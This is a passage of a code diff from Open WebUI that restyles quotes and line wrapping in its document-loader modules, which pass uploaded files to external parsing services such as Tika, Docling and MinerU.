{response.text}')
backend/open_webui/retrieval/loaders/external_web.py+6 −6 modified@@ -30,22 +30,22 @@ def lazy_load(self) -> Iterator[Document]: response = requests.post( self.external_url, headers={ - "User-Agent": "Open WebUI (https://github.com/open-webui/open-webui) External Web Loader", - "Authorization": f"Bearer {self.external_api_key}", + 'User-Agent': 'Open WebUI (https://github.com/open-webui/open-webui) External Web Loader', + 'Authorization': f'Bearer {self.external_api_key}', }, json={ - "urls": urls, + 'urls': urls, }, ) response.raise_for_status() results = response.json() for result in results: yield Document( - page_content=result.get("page_content", ""), - metadata=result.get("metadata", {}), + page_content=result.get('page_content', ''), + metadata=result.get('metadata', {}), ) except Exception as e: if self.continue_on_failure: - log.error(f"Error extracting content from batch {urls}: {e}") + log.error(f'Error extracting content from batch {urls}: {e}') else: raise e
backend/open_webui/retrieval/loaders/main.py+199 −212 modified@@ -30,59 +30,59 @@ log = logging.getLogger(__name__) known_source_ext = [ - "go", - "py", - "java", - "sh", - "bat", - "ps1", - "cmd", - "js", - "ts", - "css", - "cpp", - "hpp", - "h", - "c", - "cs", - "sql", - "log", - "ini", - "pl", - "pm", - "r", - "dart", - "dockerfile", - "env", - "php", - "hs", - "hsc", - "lua", - "nginxconf", - "conf", - "m", - "mm", - "plsql", - "perl", - "rb", - "rs", - "db2", - "scala", - "bash", - "swift", - "vue", - "svelte", - "ex", - "exs", - "erl", - "tsx", - "jsx", - "hs", - "lhs", - "json", - "yaml", - "yml", - "toml", + 'go', + 'py', + 'java', + 'sh', + 'bat', + 'ps1', + 'cmd', + 'js', + 'ts', + 'css', + 'cpp', + 'hpp', + 'h', + 'c', + 'cs', + 'sql', + 'log', + 'ini', + 'pl', + 'pm', + 'r', + 'dart', + 'dockerfile', + 'env', + 'php', + 'hs', + 'hsc', + 'lua', + 'nginxconf', + 'conf', + 'm', + 'mm', + 'plsql', + 'perl', + 'rb', + 'rs', + 'db2', + 'scala', + 'bash', + 'swift', + 'vue', + 'svelte', + 'ex', + 'exs', + 'erl', + 'tsx', + 'jsx', + 'hs', + 'lhs', + 'json', + 'yaml', + 'yml', + 'toml', ] @@ -99,11 +99,11 @@ def load(self) -> list[Document]: xls = pd.ExcelFile(self.file_path) for sheet_name in xls.sheet_names: df = pd.read_excel(xls, sheet_name=sheet_name) - text_parts.append(f"Sheet: {sheet_name}\n{df.to_string(index=False)}") + text_parts.append(f'Sheet: {sheet_name}\n{df.to_string(index=False)}') return [ Document( - page_content="\n\n".join(text_parts), - metadata={"source": self.file_path}, + page_content='\n\n'.join(text_parts), + metadata={'source': self.file_path}, ) ] @@ -125,11 +125,11 @@ def load(self) -> list[Document]: if shape.has_text_frame: slide_texts.append(shape.text_frame.text) if slide_texts: - text_parts.append(f"Slide {i}:\n" + "\n".join(slide_texts)) + text_parts.append(f'Slide {i}:\n' + '\n'.join(slide_texts)) return [ Document( - page_content="\n\n".join(text_parts), - metadata={"source": self.file_path}, + page_content='\n\n'.join(text_parts), + metadata={'source': self.file_path}, ) ] @@ -143,241 +143,225 @@ def __init__(self, url, file_path, mime_type=None, extract_images=None): self.extract_images = extract_images def load(self) -> list[Document]: - with open(self.file_path, "rb") as f: + with open(self.file_path, 'rb') as f: data = f.read() if self.mime_type is not None: - headers = {"Content-Type": self.mime_type} + headers = {'Content-Type': self.mime_type} else: headers = {} if self.extract_images == True: - headers["X-Tika-PDFextractInlineImages"] = "true" + headers['X-Tika-PDFextractInlineImages'] = 'true' endpoint = self.url - if not endpoint.endswith("/"): - endpoint += "/" - endpoint += "tika/text" + if not endpoint.endswith('/'): + endpoint += '/' + endpoint += 'tika/text' r = requests.put(endpoint, data=data, headers=headers, verify=REQUESTS_VERIFY) if r.ok: raw_metadata = r.json() - text = raw_metadata.get("X-TIKA:content", "<No text content found>").strip() + text = raw_metadata.get('X-TIKA:content', '<No text content found>').strip() - if "Content-Type" in raw_metadata: - headers["Content-Type"] = raw_metadata["Content-Type"] + if 'Content-Type' in raw_metadata: + headers['Content-Type'] = raw_metadata['Content-Type'] - log.debug("Tika extracted text: %s", text) + log.debug('Tika extracted text: %s', text) return [Document(page_content=text, metadata=headers)] else: - raise Exception(f"Error calling Tika: {r.reason}") + raise Exception(f'Error calling Tika: {r.reason}') class DoclingLoader: def __init__(self, url, api_key=None, file_path=None, mime_type=None, params=None): - self.url = url.rstrip("/") + self.url = url.rstrip('/') self.api_key = api_key self.file_path = file_path self.mime_type = mime_type self.params = params or {} def load(self) -> list[Document]: - with open(self.file_path, "rb") as f: + with open(self.file_path, 'rb') as f: headers = {} if self.api_key: - headers["X-Api-Key"] = f"{self.api_key}" + headers['X-Api-Key'] = f'{self.api_key}' r = requests.post( - f"{self.url}/v1/convert/file", + f'{self.url}/v1/convert/file', files={ - "files": ( + 'files': ( self.file_path, f, - self.mime_type or "application/octet-stream", + self.mime_type or 'application/octet-stream', ) }, data={ - "image_export_mode": "placeholder", + 'image_export_mode': 'placeholder', **self.params, }, headers=headers, ) if r.ok: result = r.json() - document_data = result.get("document", {}) - text = document_data.get("md_content", "<No text content found>") + document_data = result.get('document', {}) + text = document_data.get('md_content', '<No text content found>') - metadata = {"Content-Type": self.mime_type} if self.mime_type else {} + metadata = {'Content-Type': self.mime_type} if self.mime_type else {} - log.debug("Docling extracted text: %s", text) + log.debug('Docling extracted text: %s', text) return [Document(page_content=text, metadata=metadata)] else: - error_msg = f"Error calling Docling API: {r.reason}" + error_msg = f'Error calling Docling API: {r.reason}' if r.text: try: error_data = r.json() - if "detail" in error_data: - error_msg += f" - {error_data['detail']}" + if 'detail' in error_data: + error_msg += f' - {error_data["detail"]}' except Exception: - error_msg += f" - {r.text}" - raise Exception(f"Error calling Docling: {error_msg}") + error_msg += f' - {r.text}' + raise Exception(f'Error calling Docling: {error_msg}') class Loader: - def __init__(self, engine: str = "", **kwargs): + def __init__(self, engine: str = '', **kwargs): self.engine = engine - self.user = kwargs.get("user", None) + self.user = kwargs.get('user', None) self.kwargs = kwargs - def load( - self, filename: str, file_content_type: str, file_path: str - ) -> list[Document]: + def load(self, filename: str, file_content_type: str, file_path: str) -> list[Document]: loader = self._get_loader(filename, file_content_type, file_path) docs = loader.load() - return [ - Document( - page_content=ftfy.fix_text(doc.page_content), metadata=doc.metadata - ) - for doc in docs - ] + return [Document(page_content=ftfy.fix_text(doc.page_content), metadata=doc.metadata) for doc in docs] def _is_text_file(self, file_ext: str, file_content_type: str) -> bool: return file_ext in known_source_ext or ( file_content_type - and file_content_type.find("text/") >= 0 + and file_content_type.find('text/') >= 0 # Avoid text/html files being detected as text - and not file_content_type.find("html") >= 0 + and not file_content_type.find('html') >= 0 ) def _get_loader(self, filename: str, file_content_type: str, file_path: str): - file_ext = filename.split(".")[-1].lower() + file_ext = filename.split('.')[-1].lower() if ( - self.engine == "external" - and self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_URL") - and self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_API_KEY") + self.engine == 'external' + and self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_URL') + and self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_API_KEY') ): loader = ExternalDocumentLoader( file_path=file_path, - url=self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_URL"), - api_key=self.kwargs.get("EXTERNAL_DOCUMENT_LOADER_API_KEY"), + url=self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_URL'), + api_key=self.kwargs.get('EXTERNAL_DOCUMENT_LOADER_API_KEY'), mime_type=file_content_type, user=self.user, ) - elif self.engine == "tika" and self.kwargs.get("TIKA_SERVER_URL"): + elif self.engine == 'tika' and self.kwargs.get('TIKA_SERVER_URL'): if self._is_text_file(file_ext, file_content_type): loader = TextLoader(file_path, autodetect_encoding=True) else: loader = TikaLoader( - url=self.kwargs.get("TIKA_SERVER_URL"), + url=self.kwargs.get('TIKA_SERVER_URL'), file_path=file_path, - extract_images=self.kwargs.get("PDF_EXTRACT_IMAGES"), + extract_images=self.kwargs.get('PDF_EXTRACT_IMAGES'), ) elif ( - self.engine == "datalab_marker" - and self.kwargs.get("DATALAB_MARKER_API_KEY") + self.engine == 'datalab_marker' + and self.kwargs.get('DATALAB_MARKER_API_KEY') and file_ext in [ - "pdf", - "xls", - "xlsx", - "ods", - "doc", - "docx", - "odt", - "ppt", - "pptx", - "odp", - "html", - "epub", - "png", - "jpeg", - "jpg", - "webp", - "gif", - "tiff", + 'pdf', + 'xls', + 'xlsx', + 'ods', + 'doc', + 'docx', + 'odt', + 'ppt', + 'pptx', + 'odp', + 'html', + 'epub', + 'png', + 'jpeg', + 'jpg', + 'webp', + 'gif', + 'tiff', ] ): - api_base_url = self.kwargs.get("DATALAB_MARKER_API_BASE_URL", "") - if not api_base_url or api_base_url.strip() == "": - api_base_url = "https://www.datalab.to/api/v1/marker" # https://github.com/open-webui/open-webui/pull/16867#issuecomment-3218424349 + api_base_url = self.kwargs.get('DATALAB_MARKER_API_BASE_URL', '') + if not api_base_url or api_base_url.strip() == '': + api_base_url = 'https://www.datalab.to/api/v1/marker' # https://github.com/open-webui/open-webui/pull/16867#issuecomment-3218424349 loader = DatalabMarkerLoader( file_path=file_path, - api_key=self.kwargs["DATALAB_MARKER_API_KEY"], + api_key=self.kwargs['DATALAB_MARKER_API_KEY'], api_base_url=api_base_url, - additional_config=self.kwargs.get("DATALAB_MARKER_ADDITIONAL_CONFIG"), - use_llm=self.kwargs.get("DATALAB_MARKER_USE_LLM", False), - skip_cache=self.kwargs.get("DATALAB_MARKER_SKIP_CACHE", False), - force_ocr=self.kwargs.get("DATALAB_MARKER_FORCE_OCR", False), - paginate=self.kwargs.get("DATALAB_MARKER_PAGINATE", False), - strip_existing_ocr=self.kwargs.get( - "DATALAB_MARKER_STRIP_EXISTING_OCR", False - ), - disable_image_extraction=self.kwargs.get( - "DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION", False - ), - format_lines=self.kwargs.get("DATALAB_MARKER_FORMAT_LINES", False), - output_format=self.kwargs.get( - "DATALAB_MARKER_OUTPUT_FORMAT", "markdown" - ), + additional_config=self.kwargs.get('DATALAB_MARKER_ADDITIONAL_CONFIG'), + use_llm=self.kwargs.get('DATALAB_MARKER_USE_LLM', False), + skip_cache=self.kwargs.get('DATALAB_MARKER_SKIP_CACHE', False), + force_ocr=self.kwargs.get('DATALAB_MARKER_FORCE_OCR', False), + paginate=self.kwargs.get('DATALAB_MARKER_PAGINATE', False), + strip_existing_ocr=self.kwargs.get('DATALAB_MARKER_STRIP_EXISTING_OCR', False), + disable_image_extraction=self.kwargs.get('DATALAB_MARKER_DISABLE_IMAGE_EXTRACTION', False), + format_lines=self.kwargs.get('DATALAB_MARKER_FORMAT_LINES', False), + output_format=self.kwargs.get('DATALAB_MARKER_OUTPUT_FORMAT', 'markdown'), ) - elif self.engine == "docling" and self.kwargs.get("DOCLING_SERVER_URL"): + elif self.engine == 'docling' and self.kwargs.get('DOCLING_SERVER_URL'): if self._is_text_file(file_ext, file_content_type): loader = TextLoader(file_path, autodetect_encoding=True) else: # Build params for DoclingLoader - params = self.kwargs.get("DOCLING_PARAMS", {}) + params = self.kwargs.get('DOCLING_PARAMS', {}) if not isinstance(params, dict): try: params = json.loads(params) except json.JSONDecodeError: - log.error("Invalid DOCLING_PARAMS format, expected JSON object") + log.error('Invalid DOCLING_PARAMS format, expected JSON object') params = {} loader = DoclingLoader( - url=self.kwargs.get("DOCLING_SERVER_URL"), - api_key=self.kwargs.get("DOCLING_API_KEY", None), + url=self.kwargs.get('DOCLING_SERVER_URL'), + api_key=self.kwargs.get('DOCLING_API_KEY', None), file_path=file_path, mime_type=file_content_type, params=params, ) elif ( - self.engine == "document_intelligence" - and self.kwargs.get("DOCUMENT_INTELLIGENCE_ENDPOINT") != "" + self.engine == 'document_intelligence' + and self.kwargs.get('DOCUMENT_INTELLIGENCE_ENDPOINT') != '' and ( - file_ext in ["pdf", "docx", "ppt", "pptx"] + file_ext in ['pdf', 'docx', 'ppt', 'pptx'] or file_content_type in [ - "application/vnd.openxmlformats-officedocument.wordprocessingml.document", - "application/vnd.ms-powerpoint", - "application/vnd.openxmlformats-officedocument.presentationml.presentation", + 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', + 'application/vnd.ms-powerpoint', + 'application/vnd.openxmlformats-officedocument.presentationml.presentation', ] ) ): - if self.kwargs.get("DOCUMENT_INTELLIGENCE_KEY") != "": + if self.kwargs.get('DOCUMENT_INTELLIGENCE_KEY') != '': loader = AzureAIDocumentIntelligenceLoader( file_path=file_path, - api_endpoint=self.kwargs.get("DOCUMENT_INTELLIGENCE_ENDPOINT"), - api_key=self.kwargs.get("DOCUMENT_INTELLIGENCE_KEY"), - api_model=self.kwargs.get("DOCUMENT_INTELLIGENCE_MODEL"), + api_endpoint=self.kwargs.get('DOCUMENT_INTELLIGENCE_ENDPOINT'), + api_key=self.kwargs.get('DOCUMENT_INTELLIGENCE_KEY'), + api_model=self.kwargs.get('DOCUMENT_INTELLIGENCE_MODEL'), ) else: loader = AzureAIDocumentIntelligenceLoader( file_path=file_path, - api_endpoint=self.kwargs.get("DOCUMENT_INTELLIGENCE_ENDPOINT"), + api_endpoint=self.kwargs.get('DOCUMENT_INTELLIGENCE_ENDPOINT'), azure_credential=DefaultAzureCredential(), - api_model=self.kwargs.get("DOCUMENT_INTELLIGENCE_MODEL"), + api_model=self.kwargs.get('DOCUMENT_INTELLIGENCE_MODEL'), ) - elif self.engine == "mineru" and file_ext in [ - "pdf" - ]: # MinerU currently only supports PDF - - mineru_timeout = self.kwargs.get("MINERU_API_TIMEOUT", 300) + elif self.engine == 'mineru' and file_ext in ['pdf']: # MinerU currently only supports PDF + mineru_timeout = self.kwargs.get('MINERU_API_TIMEOUT', 300) if mineru_timeout: try: mineru_timeout = int(mineru_timeout) @@ -386,116 +370,119 @@ def _get_loader(self, filename: str, file_content_type: str, file_path: str): loader = MinerULoader( file_path=file_path, - api_mode=self.kwargs.get("MINERU_API_MODE", "local"), - api_url=self.kwargs.get("MINERU_API_URL", "http://localhost:8000"), - api_key=self.kwargs.get("MINERU_API_KEY", ""), - params=self.kwargs.get("MINERU_PARAMS", {}), + api_mode=self.kwargs.get('MINERU_API_MODE', 'local'), + api_url=self.kwargs.get('MINERU_API_URL', 'http://localhost:8000'), + api_key=self.kwargs.get('MINERU_API_KEY', ''), + params=self.kwargs.get('MINERU_PARAMS', {}), timeout=mineru_timeout, ) elif ( - self.engine == "mistral_ocr" - and self.kwargs.get("MISTRAL_OCR_API_KEY") != "" - and file_ext - in ["pdf"] # Mistral OCR currently only supports PDF and images + self.engine == 'mistral_ocr' + and self.kwargs.get('MISTRAL_OCR_API_KEY') != '' + and file_ext in ['pdf'] # Mistral OCR currently only supports PDF and images ): loader = MistralLoader( - base_url=self.kwargs.get("MISTRAL_OCR_API_BASE_URL"), - api_key=self.kwargs.get("MISTRAL_OCR_API_KEY"), + base_url=self.kwargs.get('MISTRAL_OCR_API_BASE_URL'), + api_key=self.kwargs.get('MISTRAL_OCR_API_KEY'), file_path=file_path, ) else: - if file_ext == "pdf": + if file_ext == 'pdf': loader = PyPDFLoader( file_path, - extract_images=self.kwargs.get("PDF_EXTRACT_IMAGES"), - mode=self.kwargs.get("PDF_LOADER_MODE", "page"), + extract_images=self.kwargs.get('PDF_EXTRACT_IMAGES'), + mode=self.kwargs.get('PDF_LOADER_MODE', 'page'), ) - elif file_ext == "csv": + elif file_ext == 'csv': loader = CSVLoader(file_path, autodetect_encoding=True) - elif file_ext == "rst": + elif file_ext == 'rst': try: from langchain_community.document_loaders import UnstructuredRSTLoader - loader = UnstructuredRSTLoader(file_path, mode="elements") + + loader = UnstructuredRSTLoader(file_path, mode='elements') except ImportError: log.warning( "The 'unstructured' package is not installed. " - "Falling back to plain text loading for .rst file. " - "Install it with: pip install unstructured" + 'Falling back to plain text loading for .rst file. ' + 'Install it with: pip install unstructured' ) loader = TextLoader(file_path, autodetect_encoding=True) - elif file_ext == "xml": + elif file_ext == 'xml': try: from langchain_community.document_loaders import UnstructuredXMLLoader + loader = UnstructuredXMLLoader(file_path) except ImportError: log.warning( "The 'unstructured' package is not installed. " - "Falling back to plain text loading for .xml file. " - "Install it with: pip install unstructured" + 'Falling back to plain text loading for .xml file. ' + 'Install it with: pip install unstructured' ) loader = TextLoader(file_path, autodetect_encoding=True) - elif file_ext in ["htm", "html"]: - loader = BSHTMLLoader(file_path, open_encoding="unicode_escape") - elif file_ext == "md": + elif file_ext in ['htm', 'html']: + loader = BSHTMLLoader(file_path, open_encoding='unicode_escape') + elif file_ext == 'md': loader = TextLoader(file_path, autodetect_encoding=True) - elif file_content_type == "application/epub+zip": + elif file_content_type == 'application/epub+zip': try: from langchain_community.document_loaders import UnstructuredEPubLoader + loader = UnstructuredEPubLoader(file_path) except ImportError: raise ValueError( "Processing .epub files requires the 'unstructured' package. " - "Install it with: pip install unstructured" + 'Install it with: pip install unstructured' ) elif ( - file_content_type - == "application/vnd.openxmlformats-officedocument.wordprocessingml.document" - or file_ext == "docx" + file_content_type == 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' + or file_ext == 'docx' ): loader = Docx2txtLoader(file_path) elif file_content_type in [ - "application/vnd.ms-excel", - "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", - ] or file_ext in ["xls", "xlsx"]: + 'application/vnd.ms-excel', + 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', + ] or file_ext in ['xls', 'xlsx']: try: from langchain_community.document_loaders import UnstructuredExcelLoader + loader = UnstructuredExcelLoader(file_path) except ImportError: log.warning( "The 'unstructured' package is not installed. " - "Falling back to pandas for Excel file loading. " - "Install unstructured for better results: pip install unstructured" + 'Falling back to pandas for Excel file loading. ' + 'Install unstructured for better results: pip install unstructured' ) loader = ExcelLoader(file_path) elif file_content_type in [ - "application/vnd.ms-powerpoint", - "application/vnd.openxmlformats-officedocument.presentationml.presentation", - ] or file_ext in ["ppt", "pptx"]: + 'application/vnd.ms-powerpoint', + 'application/vnd.openxmlformats-officedocument.presentationml.presentation', + ] or file_ext in ['ppt', 'pptx']: try: from langchain_community.document_loaders import UnstructuredPowerPointLoader + loader = UnstructuredPowerPointLoader(file_path) except ImportError: log.warning( "The 'unstructured' package is not installed. " - "Falling back to python-pptx for PowerPoint file loading. " - "Install unstructured for better results: pip install unstructured" + 'Falling back to python-pptx for PowerPoint file loading. ' + 'Install unstructured for better results: pip install unstructured' ) loader = PptxLoader(file_path) - elif file_ext == "msg": + elif file_ext == 'msg': loader = OutlookMessageLoader(file_path) - elif file_ext == "odt": + elif file_ext == 'odt': try: from langchain_community.document_loaders import UnstructuredODTLoader + loader = UnstructuredODTLoader(file_path) except ImportError: raise ValueError( "Processing .odt files requires the 'unstructured' package. " - "Install it with: pip install unstructured" + 'Install it with: pip install unstructured' ) elif self._is_text_file(file_ext, file_content_type): loader = TextLoader(file_path, autodetect_encoding=True) else: loader = TextLoader(file_path, autodetect_encoding=True) return loader -
backend/open_webui/retrieval/loaders/mineru.py+117 −135 modified@@ -22,65 +22,63 @@ class MinerULoader: def __init__( self, file_path: str, - api_mode: str = "local", - api_url: str = "http://localhost:8000", - api_key: str = "", + api_mode: str = 'local', + api_url: str = 'http://localhost:8000', + api_key: str = '', params: dict = None, timeout: Optional[int] = 300, ): self.file_path = file_path self.api_mode = api_mode.lower() - self.api_url = api_url.rstrip("/") + self.api_url = api_url.rstrip('/') self.api_key = api_key self.timeout = timeout # Parse params dict with defaults self.params = params or {} - self.enable_ocr = params.get("enable_ocr", False) - self.enable_formula = params.get("enable_formula", True) - self.enable_table = params.get("enable_table", True) - self.language = params.get("language", "en") - self.model_version = params.get("model_version", "pipeline") + self.enable_ocr = params.get('enable_ocr', False) + self.enable_formula = params.get('enable_formula', True) + self.enable_table = params.get('enable_table', True) + self.language = params.get('language', 'en') + self.model_version = params.get('model_version', 'pipeline') - self.page_ranges = self.params.pop("page_ranges", "") + self.page_ranges = self.params.pop('page_ranges', '') # Validate API mode - if self.api_mode not in ["local", "cloud"]: - raise ValueError( - f"Invalid API mode: {self.api_mode}. Must be 'local' or 'cloud'" - ) + if self.api_mode not in ['local', 'cloud']: + raise ValueError(f"Invalid API mode: {self.api_mode}. Must be 'local' or 'cloud'") # Validate Cloud API requirements - if self.api_mode == "cloud" and not self.api_key: - raise ValueError("API key is required for Cloud API mode") + if self.api_mode == 'cloud' and not self.api_key: + raise ValueError('API key is required for Cloud API mode') def load(self) -> List[Document]: """ Main entry point for loading and parsing the document. Routes to Cloud or Local API based on api_mode. """ try: - if self.api_mode == "cloud": + if self.api_mode == 'cloud': return self._load_cloud_api() else: return self._load_local_api() except Exception as e: - log.error(f"Error loading document with MinerU: {e}") + log.error(f'Error loading document with MinerU: {e}') raise def _load_local_api(self) -> List[Document]: """ Load document using Local API (synchronous). Posts file to /file_parse endpoint and gets immediate response. """ - log.info(f"Using MinerU Local API at {self.api_url}") + log.info(f'Using MinerU Local API at {self.api_url}') filename = os.path.basename(self.file_path) # Build form data for Local API form_data = { **self.params, - "return_md": "true", + 'return_md': 'true', } # Page ranges (Local API uses start_page_id and end_page_id) @@ -89,46 +87,44 @@ def _load_local_api(self) -> List[Document]: # Full page range parsing would require parsing the string log.warning( f"Page ranges '{self.page_ranges}' specified but Local API uses different format. " - "Consider using start_page_id/end_page_id parameters if needed." + 'Consider using start_page_id/end_page_id parameters if needed.' ) try: - with open(self.file_path, "rb") as f: - files = {"files": (filename, f, "application/octet-stream")} + with open(self.file_path, 'rb') as f: + files = {'files': (filename, f, 'application/octet-stream')} - log.info(f"Sending file to MinerU Local API: {filename}") - log.debug(f"Local API parameters: {form_data}") + log.info(f'Sending file to MinerU Local API: {filename}') + log.debug(f'Local API parameters: {form_data}') response = requests.post( - f"{self.api_url}/file_parse", + f'{self.api_url}/file_parse', data=form_data, files=files, timeout=self.timeout, ) response.raise_for_status() except FileNotFoundError: - raise HTTPException( - status.HTTP_404_NOT_FOUND, detail=f"File not found: {self.file_path}" - ) + raise HTTPException(status.HTTP_404_NOT_FOUND, detail=f'File not found: {self.file_path}') except requests.Timeout: raise HTTPException( status.HTTP_504_GATEWAY_TIMEOUT, - detail="MinerU Local API request timed out", + detail='MinerU Local API request timed out', ) except requests.HTTPError as e: - error_detail = f"MinerU Local API request failed: {e}" + error_detail = f'MinerU Local API request failed: {e}' if e.response is not None: try: error_data = e.response.json() - error_detail += f" - {error_data}" + error_detail += f' - {error_data}' except Exception: - error_detail += f" - {e.response.text}" + error_detail += f' - {e.response.text}' raise HTTPException(status.HTTP_400_BAD_REQUEST, detail=error_detail) except Exception as e: raise HTTPException( status.HTTP_500_INTERNAL_SERVER_ERROR, - detail=f"Error calling MinerU Local API: {str(e)}", + detail=f'Error calling MinerU Local API: {str(e)}', ) # Parse response @@ -137,41 +133,41 @@ def _load_local_api(self) -> List[Document]: except ValueError as e: raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail=f"Invalid JSON response from MinerU Local API: {e}", + detail=f'Invalid JSON response from MinerU Local API: {e}', ) # Extract markdown content from response - if "results" not in result: + if 'results' not in result: raise HTTPException( status.HTTP_502_BAD_GATEWAY, detail="MinerU Local API response missing 'results' field", ) - results = result["results"] + results = result['results'] if not results: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail="MinerU returned empty results", + detail='MinerU returned empty results', ) # Get the first (and typically only) result file_result = list(results.values())[0] - markdown_content = file_result.get("md_content", "") + markdown_content = file_result.get('md_content', '') if not markdown_content: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail="MinerU returned empty markdown content", + detail='MinerU returned empty markdown content', ) - log.info(f"Successfully parsed document with MinerU Local API: {filename}") + log.info(f'Successfully parsed document with MinerU Local API: {filename}') # Create metadata metadata = { - "source": filename, - "api_mode": "local", - "backend": result.get("backend", "unknown"), - "version": result.get("version", "unknown"), + 'source': filename, + 'api_mode': 'local', + 'backend': result.get('backend', 'unknown'), + 'version': result.get('version', 'unknown'), } return [Document(page_content=markdown_content, metadata=metadata)] @@ -181,7 +177,7 @@ def _load_cloud_api(self) -> List[Document]: Load document using Cloud API (asynchronous). Uses batch upload endpoint to avoid need for public file URLs. """ - log.info(f"Using MinerU Cloud API at {self.api_url}") + log.info(f'Using MinerU Cloud API at {self.api_url}') filename = os.path.basename(self.file_path) @@ -195,17 +191,15 @@ def _load_cloud_api(self) -> List[Document]: result = self._poll_batch_status(batch_id, filename) # Step 4: Download and extract markdown from ZIP - markdown_content = self._download_and_extract_zip( - result["full_zip_url"], filename - ) + markdown_content = self._download_and_extract_zip(result['full_zip_url'], filename) - log.info(f"Successfully parsed document with MinerU Cloud API: {filename}") + log.info(f'Successfully parsed document with MinerU Cloud API: {filename}') # Create metadata metadata = { - "source": filename, - "api_mode": "cloud", - "batch_id": batch_id, + 'source': filename, + 'api_mode': 'cloud', + 'batch_id': batch_id, } return [Document(page_content=markdown_content, metadata=metadata)] @@ -216,243 +210,239 @@ def _request_upload_url(self, filename: str) -> tuple: Returns (batch_id, upload_url). """ headers = { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", + 'Authorization': f'Bearer {self.api_key}', + 'Content-Type': 'application/json', } # Build request body request_body = { **self.params, - "files": [ + 'files': [ { - "name": filename, - "is_ocr": self.enable_ocr, + 'name': filename, + 'is_ocr': self.enable_ocr, } ], } # Add page ranges if specified if self.page_ranges: - request_body["files"][0]["page_ranges"] = self.page_ranges + request_body['files'][0]['page_ranges'] = self.page_ranges - log.info(f"Requesting upload URL for: {filename}") - log.debug(f"Cloud API request body: {request_body}") + log.info(f'Requesting upload URL for: {filename}') + log.debug(f'Cloud API request body: {request_body}') try: response = requests.post( - f"{self.api_url}/file-urls/batch", + f'{self.api_url}/file-urls/batch', headers=headers, json=request_body, timeout=30, ) response.raise_for_status() except requests.HTTPError as e: - error_detail = f"Failed to request upload URL: {e}" + error_detail = f'Failed to request upload URL: {e}' if e.response is not None: try: error_data = e.response.json() - error_detail += f" - {error_data.get('msg', error_data)}" + error_detail += f' - {error_data.get("msg", error_data)}' except Exception: - error_detail += f" - {e.response.text}" + error_detail += f' - {e.response.text}' raise HTTPException(status.HTTP_400_BAD_REQUEST, detail=error_detail) except Exception as e: raise HTTPException( status.HTTP_500_INTERNAL_SERVER_ERROR, - detail=f"Error requesting upload URL: {str(e)}", + detail=f'Error requesting upload URL: {str(e)}', ) try: result = response.json() except ValueError as e: raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail=f"Invalid JSON response: {e}", + detail=f'Invalid JSON response: {e}', ) # Check for API error response - if result.get("code") != 0: + if result.get('code') != 0: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"MinerU Cloud API error: {result.get('msg', 'Unknown error')}", + detail=f'MinerU Cloud API error: {result.get("msg", "Unknown error")}', ) - data = result.get("data", {}) - batch_id = data.get("batch_id") - file_urls = data.get("file_urls", []) + data = result.get('data', {}) + batch_id = data.get('batch_id') + file_urls = data.get('file_urls', []) if not batch_id or not file_urls: raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail="MinerU Cloud API response missing batch_id or file_urls", + detail='MinerU Cloud API response missing batch_id or file_urls', ) upload_url = file_urls[0] - log.info(f"Received upload URL for batch: {batch_id}") + log.info(f'Received upload URL for batch: {batch_id}') return batch_id, upload_url def _upload_to_presigned_url(self, upload_url: str) -> None: """ Upload file to presigned URL (no authentication needed). """ - log.info(f"Uploading file to presigned URL") + log.info(f'Uploading file to presigned URL') try: - with open(self.file_path, "rb") as f: + with open(self.file_path, 'rb') as f: response = requests.put( upload_url, data=f, timeout=self.timeout, ) response.raise_for_status() except FileNotFoundError: - raise HTTPException( - status.HTTP_404_NOT_FOUND, detail=f"File not found: {self.file_path}" - ) + raise HTTPException(status.HTTP_404_NOT_FOUND, detail=f'File not found: {self.file_path}') except requests.Timeout: raise HTTPException( status.HTTP_504_GATEWAY_TIMEOUT, - detail="File upload to presigned URL timed out", + detail='File upload to presigned URL timed out', ) except requests.HTTPError as e: raise HTTPException( status.HTTP_400_BAD_REQUEST, - detail=f"Failed to upload file to presigned URL: {e}", + detail=f'Failed to upload file to presigned URL: {e}', ) except Exception as e: raise HTTPException( status.HTTP_500_INTERNAL_SERVER_ERROR, - detail=f"Error uploading file: {str(e)}", + detail=f'Error uploading file: {str(e)}', ) - log.info("File uploaded successfully") + log.info('File uploaded successfully') def _poll_batch_status(self, batch_id: str, filename: str) -> dict: """ Poll batch status until completion. Returns the result dict for the file. """ headers = { - "Authorization": f"Bearer {self.api_key}", + 'Authorization': f'Bearer {self.api_key}', } max_iterations = 300 # 10 minutes max (2 seconds per iteration) poll_interval = 2 # seconds - log.info(f"Polling batch status: {batch_id}") + log.info(f'Polling batch status: {batch_id}') for iteration in range(max_iterations): try: response = requests.get( - f"{self.api_url}/extract-results/batch/{batch_id}", + f'{self.api_url}/extract-results/batch/{batch_id}', headers=headers, timeout=30, ) response.raise_for_status() except requests.HTTPError as e: - error_detail = f"Failed to poll batch status: {e}" + error_detail = f'Failed to poll batch status: {e}' if e.response is not None: try: error_data = e.response.json() - error_detail += f" - {error_data.get('msg', error_data)}" + error_detail += f' - {error_data.get("msg", error_data)}' except Exception: - error_detail += f" - {e.response.text}" + error_detail += f' - {e.response.text}' raise HTTPException(status.HTTP_400_BAD_REQUEST, detail=error_detail) except Exception as e: raise HTTPException( status.HTTP_500_INTERNAL_SERVER_ERROR, - detail=f"Error polling batch status: {str(e)}", + detail=f'Error polling batch status: {str(e)}', ) try: result = response.json() except ValueError as e: raise HTTPException( status.HTTP_502_BAD_GATEWAY, - detail=f"Invalid JSON response while polling: {e}", + detail=f'Invalid JSON response while polling: {e}', ) # Check for API error response - if result.get("code") != 0: + if result.get('code') 